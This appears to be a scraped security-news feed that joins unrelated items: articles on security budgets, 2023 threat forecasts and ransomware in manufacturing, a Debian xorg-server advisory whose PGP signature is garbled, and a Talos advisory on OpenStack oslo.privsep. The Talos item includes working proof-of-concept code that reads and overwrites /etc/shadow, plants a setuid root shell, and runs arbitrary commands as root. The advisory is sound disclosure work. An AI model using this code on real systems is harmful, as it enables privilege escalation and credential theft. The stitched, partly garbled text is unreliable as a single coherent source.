Because of latent demand, the call for cybersecurity workers is in flux. While some companies — Patreon, for example — have laid off their cybersecurity teams, other businesses are pausing hiring, as many have open requisitions for cybersecurity specialists. It would be difficult to fill positions anyway: There are currently only enough cybersecurity workers to fill 65% of positions, according to CyberSeek US.

Instead, security teams will have to make do with what they have going forward. The best way to do that is consolidating vendors to reduce costs, and find ways to bring in managed security service providers (MSSPs) to help with areas in which they lack expertise, says Mike Hamilton, chief information security officer at threat-detection and management firm Critical Insight.

"Enterprises have the ability to hire and maintain large teams, so they will continue to do that, but in the mid-market, IT has just got to suck it up and do more security as part of their job," he says. "That's pretty much they way it is everywhere."

While economists and business leaders do not have a great track record for forecasting recessions, current surveys of sentiment have set historical records for recessionary predictions. The Wall Street Journal's quarterly survey of economists found that 63% expect a recession in the next 12 months, the highest registered negative sentiment from economists in the nation outside of an ongoing recession.

Half of companies are already considering instituting IT technology austerity measures, a share that will likely increase if a recession takes hold. Yet, information security should not relax their defensive vigilance, says Merritt Maxim, vice president and research director at Forrester Research.

"Companies need to be as diligent as before," he says. "Hackers and others are not going to stop doing what they have been doing, because of a recession. That will actually spur more activity."

**Turning to the Cloud to Cut IT Security Costs**

Companies should consider moving more infrastructure to the cloud as an austerity measure, experts say. While US firms have moved less than half (45%) of current infrastructure to cloud services, they expect to have 58% of their applications in the cloud in two years, according to Forrester.

While cloud costs have risen and cloud-native application require a different set of skills to secure, they still cost less than equivalent on-premise technologies, Forrester stated in its "Planning Guide 2023: Security & Risk" report. Based on the costs for maintenance, licensing, upgrades, and other investments, on-premises technology consumes the largest percentage of security costs — 41% for companies spending 20% or less of their IT budget on security.

Other experts also recommended cloud infrastructure as being easier and less costly to secure.

"Budget pressure also poses an opportunity and added incentive to accelerate this transformation rather than continue to execute on previous templates," enterprise software firm SAP stated in its security recommendations for 2023. "The cloud poses new security challenges, but also capabilities to optimize and make use of economies of scale."

**Security Vendor Consolidation Reigns: But It May Not Be a Choice**

Managing the disparate security, compliance, and threat-intelligence systems necessary to have visibility and control in a corporate environment has ballooned in the past decade. The average large company has 75 security solutions, according to Microsoft. Over all businesses, the number is smaller but still large, with 13% of companies having more than 20 vendors, according to Cisco's 2020 CISO Benchmark Study.

No wonder, then, that consolidation has become a major strategy going into 2023, with three-quarters of businesses planning to reduce the number of security vendors on which they rely. And many vendors are leaning into that consolidation strategy, not surprisingly. Microsoft, for example, touts cost savings as one of the benefits of consolidating to a single vendor's products and services, claiming that unifying security, compliance, and identity solutions can save up to 60% in costs.

"Managing multiple vendors can be burdensome for IT, while valuable security insights sit siloed in separate dashboards," Vasu Jakkal, corporate vice president for security, compliance, identity, and management at Microsoft, stated in a blog post. "And siloed solutions can result in fragmented visibility and can be exploited."

As part of the strategy, many vendors are buying up smaller firms and rivals — a mixed blessing for companies given that they may have fewer choices in the future. Companies may get more capabilities for less, but they may also find themselves paying for unwanted features, says Forrester's Maxim.

"Whether companies are planning to consolidate or not, I think a lot of consolidation is going to happen on its own, either through strategic M&A or fire-sale M&A, because of where we at in this economy," he says. "Private equity still has a huge amount of capital, and the operations benefits from reducing the number of vendors is significant."

Finally, organizations will find that there are some costly security and risk areas that they simply cannot jettison, such as compliance and governance costs, Critical Insight's Hamilton says. Publicly traded companies, in particular, have little leeway in cutting the costs associated with some regulations.

"You cannot neglect things like governance," he tells Dark Reading, "and you have to make sure your compliance is being met every year."

Security on a Shoestring? Cloud, Consolidation Best Bets for Businesses

Our growing interconnectedness poses almost as many challenges as it does benefits.

The number of cyberattacks around the world jumped 28% in the third quarter of 2022. Such a figure is not surprising because recent years have brought more and bigger attacks on almost every sector. The coming year will no doubt also be filled with attacks and risks, despite companies spending even more on solutions and both governments and the private sector taking further steps to prioritize security.

While many of the current trends will continue, there also will be significant changes and developments in the year ahead. The increasingly efficient and business-minded manner of both cybercriminals and state-backed attackers will drive many of these growing trends and new challenges.

**Expect More Disruptive Attacks**

Business disruption due to cyberattacks is on track to become a bigger problem. During the past 12 months, 93% of organizations have suffered a data-related business disruption, and 43% reported permanent data loss, according to a recent survey. This comes as attackers move away from ransomware attacks, which hold data hostage for money and have fallen by 8% in recent months, and carry out attacks simply to disrupt services and activities, sometimes by erasing data, rather than to raise money. 

Political motivations are often behind such purely disruptive attacks, including Russia-linked or Russia-backed hackers who have targeted businesses in Ukraine, or those that support Ukraine. The public nature of these disruptive attacks, including denial-of-service (DoS) attacks, is also an effective way for hacking groups to build up their brands. This public relations effort is important as more groups, including the infamous Conti group that shut down several government websites and services for months in Costa Rica, seek affiliates to work with on attacks.

**Signs Are Pointing to a Catastrophic Attack**

We will not likely get through the coming year without some sort of catastrophic attack on a very strategic and important network or service provider like Gmail, WhatsApp, or Microsoft. We have long known — and it became even more clear from Twitter whistleblower and former head of security Peiter Zatko, who exposed lax data security practices at the social media giant — that the biggest tech companies, with the biggest security budgets, still have severe challenges. 

If a global software provider or communication platform is attacked it could lead to significant disruption of business and communication, and put the personal data of billions at risk. It would be a worldwide event with lasting economic, social, and political consequences.

**Supply Chain Attacks Will Persist — and Grow**

Supply chain attacks, in which bad actors gain access to organizations through third parties, enabling one attack to include hundreds of victims, will continue to increase as hacking groups become more business-oriented and concerned with efficiency. These types of attacks have already increased by nearly eightfold over the past three years. Many of the largest and most threatening groups are no longer operating alone. In addition to working with affiliates, they are working with states. States are hiring them, funding them, or simply providing them a safe harbor from which to operate. With more at stake, including funding from government or affiliates, these groups are under pressure to accomplish more damage in shorter amounts of time, in the most efficient way possible.

These bad actors are evolving into a modern form of organized crime, and as long as efficiency and results remain important to them, they will pursue supply chain attacks. Such attacks put every sort of organization that uses any type of cloud software at risk, meaning every company must embrace intelligence and be prepared for attacks from sophisticated criminal gangs or state-backed attackers.

**Personalized Attacks Will Target Executives and Their Friends and Family**

We will see more personalization of attacks, including bad actors using tactics like demanding money or network access credentials in return for not releasing valuable or sensitive data they already have. A growing related tactic is "sextortion," or threatening to release embarrassing information, photos, or videos unless the victim gives over money, information, or network credentials. In other cases, attackers offer to pay money in return for passwords or other information that can help them carry out a future cyberattack. 

What all of these attacks have in common is that they are very personal in nature, especially those that rely on sextortion. They can affect business executives, public figures, and anyone else who has a public profile or access to confidential or valuable data and information. But in addition, these types of attacks also often involve friends or family members of their ultimate victims. For example, in one case my company dealt with, a teenager received emails threatening to reveal that he was gay — something his family did not know — unless he installed some files on his home network. Acting out of fear, he installed the files, and this eventually gave a cyberattacker potential access to his mother, an executive at a large company.

With attackers growing more sophisticated and more focused on efficiency, it is more important than ever for businesses to understand and improve their security posture. In the constantly evolving threatscape, no organization can consider itself immune to attacks by the biggest hacking groups, including those backed or sheltered by governments. We are entering a new era in which interconnectedness poses almost as many challenges as it does benefits.

'Sextortion,' Business Disruption, and a Massive Attack: What Could Be in Store for 2023

Debian Linux Security Advisory 5304-1 - Jan-Niklas Sohn discovered several vulnerabilities in X server extensions in the X.Org X server, which may result in privilege escalation if the X server is running privileged.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5304-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 20, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2022-4283 CVE-2022-46340 CVE-2022-46341 CVE-2022-46342  
                 CVE-2022-46343 CVE-2022-46344  
Debian Bug     : 1026071

Jan-Niklas Sohn discovered several vulnerabilities in X server extensions  
in the X.Org X server, which may result in privilege escalation if the X  
server is running privileged.

For the stable distribution (bullseye), these problems have been fixed in  
version 2:1.20.11-1+deb11u4.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOiEgFfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qysw//b3WxFj6Bvmix6MNP/D/izMHimLJrgWZthnCpgFIQxwpNrho3YexS3dkh  
nfFIv6FKkFHoWvDDkURee2AROshngIgcl0/yrlouV9gaR0ZtVCI//Ku9t5hTatTd  
/fC9AlIq/s9zgeslq8RzDwhcbQQtT4M0aqQbCt5V9pJGPJ5WTWp9l0D/KVkkiIfU  
6CIJn1xvw6Nu/3m9BWG0VrHP83jTVJi6KhGfFAZkYhTsfw/TOfLUN5nZnQFnNvrR  
+XwruR3Zy1ZA5pStWPVuuGQwi0xuhy3weiz92mGUhRsavw4SrJsL54k+gg5Su2lW  
dzgiRVpjERtbLKXSQxin1nMM3LUePxnFvHwmTaC00XUL2YCLuCECl7NDMIncjJiF  
+rYEEUtAvPOjIC4bvt3KUDfj3pf37/YqhEXgauqc0Gm3irAM/gkxypSszEeYaxne  
7THA+DYh3fnrpZA1tGyCzS4gUPLaxsGU/cRej9ES57rKyZY9n/gdO6r6sPybgZIL  
lRGOt2Unl3eIgMkrH2THLg0v/Rume5Gi4demI5GAoxOw4r500jU+X+/BZLd09pyC  
lhtDUFfcaf7J/LyT/EM98M/mAp4iCq4lFuZbCxoGyip/HsaPtWb4EQw9mVzkAByM  
BnwC/La8g0z0n/b/eMNM2hd7BajKH4uobmvfRicyCc5YG3CrE10Èpj  
-----END PGP SIGNATURE-----

Debian Security Advisory 5304-1

A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.

**SUMMARY**

A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

**PRODUCT URLS**

OpenStack - https://opendev.org/openstack/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-269 - Improper Privilege Management

**DETAILS**

OpenStack is a cloud platform that contains a number of tools, libraries and services for providing simplified, powerful and scalable cloud-based applications.

OpenStack’s oslo.privsep library “helps applications perform actions which require more or less privileges… in a safe, easy to code and easy to use manner.” An entry in sudoers is generally added to bootstrap oslo.privsep with the correct privileges when run from an unprivileged user such as nova.

The oslo.privsep design documents state the following:

    Privileged functions must be as simple, specialized and narrow as possible, so as to prevent further escalation. In this example, 
    update_motd(message) is narrow: it only allows the service to overwrite the MOTD file. If a more generic update_file(filename, content) was created, 
    it could be used to overwrite any file in the filesystem, allowing easy escalation to root rights. That would defeat the whole purpose of oslo.privsep.
    ...
    Provided the unprivileged<->privileged boundary contains any hole that effectively grants root to the caller, then there is little benefit to having the separation [provided by privsep]
    

Two modules were observed to have functions that were overly broad and allowed for trivial escalation to root. The nova module contains privileged wrappers for chmod, chown and rmdir, as well as arbitrary file create/write/move/read. Second, the os\_brick module contains functions to execute arbitrary shell commands as root. The source file contains the following comment from 2016:

    Just in case it wasn't clear, this is a massive security back-door. [these wrappers] allow any command to be run as the privileged user (default "root"). 
    This is intended only as an expedient transition and should be removed ASAP.
    

Either of the above modules are sufficient to achieve privilege escalation to root. Other modules within OpenStack were not audited, but it is possible that similar issues exist elsewhere in the codebase.

**Crash Information****Method 1 (nova)**

    from nova.privsep.path import *
    from oslo_config.cfg import CONF
    CONF.privsep_context = 'nova.privsep.sys_admin_pctxt'
    # Read /etc/shadow
    last_bytes("/etc/shadow", 1000)
    # Write to /etc/shadow
    writefile("/etc/shadow", "wb", b"<payload_here>")
    # Get a root shell
    os.system("cp /bin/bash /tmp/bash")
    chown("/tmp/bash", 0)
    chmod("/tmp/bash", 0o4755)
    os.system("/tmp/bash -p")
    bash-5.1#
    

**Method 2 (os\_brick)**

    from os_brick.privileged.rootwrap import *
    from oslo_config.cfg import CONF
    import shlex # helpful for multi-arg commands
    CONF.privsep_context = 'os_brick.privileged.default'
    execute_root(*shlex.split("id"))
    ('uid=0(root) gid=0(root) groups=0(root)\n', '')
    

**Mitigation**

Privileged functions in the nova and os_brick modules of OpenStack should be rewritten to be as specialized and narrowly tailored as possible; e.g. chmod(path, mode) should be replaced with a function that only applies pre-defined permissions on one or more pre-defined files.

Suggest auditing other modules that use oslo.privsep to identify similar issues.

**TIMELINE**

2022-09-07 - Vendor Disclosure  
2022-12-20 - Public Release

CVE-2022-38065: TALOS-2022-1599 || Cisco Talos Intelligence Group

Lower cybersecurity awareness coupled with vulnerable OT gear makes manufacturers tempting targets, but zero trust can blunt attackers’ advantages.

Everyone in information security knows ransomware actors target different industries for different reasons. Some are seen as flush with cash. Some have obvious reasons for needing to resume operations ASAP. Others are just widely recognized as poorly protected.

But did you know that manufacturers pay the highest ransoms of any vertical?

A recent report spelled it out in stark detail. Across all industries, the average ransom paid is a hefty $812,360. Yet for manufacturing, that average skyrockets to a stunning $2,036,189 — about two and a half times the average.

Attackers prefer easy, weak targets as a rule. So what is it about manufacturing that qualifies such organizations as easy or weak?

First, it’s worth asking whether manufacturers are targeted more often, or if they just happen to fall victim more frequently due to inherent factors like outdated tech or lack of cybersecurity awareness. The next interesting question is why they tend to shell out sums so egregiously above what organizations in other verticals do.

As a chief information security officer (CISO) with years of experience leading cybersecurity operations for a global manufacturer, I have some immediate explanations in mind. Here are some of the factors that inevitably contribute:

*   Manufacturers typically have slim profit margins and rely on steady productivity to compensate.
*   Manufacturers know they won’t make much profit on any one iteration of manufactured goods, so high volume is necessary to hit business targets over time. But high volume requires regular output, uninterrupted by slowdowns or complete outages.
*   While organizations in industries with fatter margins might be able to tolerate an extended outage, manufacturers typically can’t. The result is exceptional pressure on manufacturers to pay ransoms and pay them quickly. That’s why attackers, conscious of all this context and the leverage it gives them, may feel emboldened to charge higher ransoms than they would in other industries.

**Manufacturing Suffers From Low Cybersecurity Awareness**

Many factory workers don’t routinely use IT gear like desktop computers, laptops, or tablets. Some may not even have corporate-issued email addresses. Additionally, very few have received extensive training on current cyber threats, and as such, wouldn’t know how to recognize, react, or, report them to their IT team once they’re spotted.

Think of the most standard, low-hanging fruit of cybersecurity awareness training: the phishing simulation. Even if email addresses are provided (far from a given, especially in manufacturing facilities in the developing world), it’s simply unreasonable to expect employees to develop an understanding of the attack chain that may lead from a phishing email to a compromise by a ransomware actor.

These factors increase an organization’s total attack surface. They make the manufacturer more apparent to attackers and more likely to fall prey to attacks if they appear.

**Manufacturing Data Can Be Extraordinarily Valuable**

Imagine that a drywall manufacturer has a unique proprietary method for creating drywall that dries quickly and can be rapidly shipped on demand, yielding a competitive advantage. This type of intellectual property, once compromised, can easily be held for an exceptionally high ransom, because the entire business model would be in jeopardy if it were to leave the company.

Similar concerns can apply to data involved in market timing. Suppose a clothing manufacturer planned to release a new line in the spring based on a combination of colors its market research found would be in high demand. The company may have orchestrated its entire spring-season marketing and supply chain ordering on that basis. Attackers could hold such information for a substantial ransom, because if it were given to competitors, those competitors may get to market first with a competing product, raking in all the expected benefits.

Operational technology (OT) used by manufacturers typically involves many assets (pumps, generators, turbines, etc.) that are on the IT infrastructure — and thus accessible to attackers — yet difficult to patch or secure. Sometimes, even if an asset can be secured, only its manufacturer can secure it without voiding the asset’s warranty.

Being outdated and insecure doesn’t always make them less valuable to the organization, however. Many times, these are legacy systems are required for a basic function, with no adequate substitute available, so the organization continues using them. Attackers often take advantage in such cases to maximize their leverage in charging ransoms.

Suppose an attacker is interested in compromising a Fortune 500 bank. If that bank is a client of a manufacturer whose security is less sophisticated than the bank’s, attackers could use the manufacturer as a stepping stone.

Additionally, manufacturing organizations often simply don’t realize how many third parties (partners, clients, suppliers) can access their networks and data. They may grant network privileges too easily, and in many cases, those privileges give unrestricted access instead of being limited to just the assets required for business purposes.

**Better Security Is Available Today**

I know from experience that manufacturers can significantly reduce their attack surface by adopting zero-trust principles. In turn, this makes it less likely that attackers opportunistically probing the open Internet for weaknesses will discover the organization.

If the organization is discovered, zero trust eliminates an adversary’s ability to move laterally across a network, where they could discover the sort of valuable data that would give them leverage over their target.

Adopting a zero trust approach helps an organization to:

*   Rigorously validate the identity of all participants in a network transaction

*   Obscure from the public Internet the true IP addresses of all assets at any manufacturing facility (or combination of them) via a buffering service

*   Segment the network and support application microtunneling, limiting any possible access by attackers

*   Apply identical policies to public clouds and remote workers, with the ability to scale automatically over time as the network topology changes

These and other techniques, once implemented, can help manufacturers reduce the risk of a breach, lessen their exposure should a breach occur, and minimize the business impact of any successful attack. Best of all, they will help manufacturers hang on to more of their hard-earned profits.

Read more _Partner Perspectives_ from Zscaler

Tag

#sap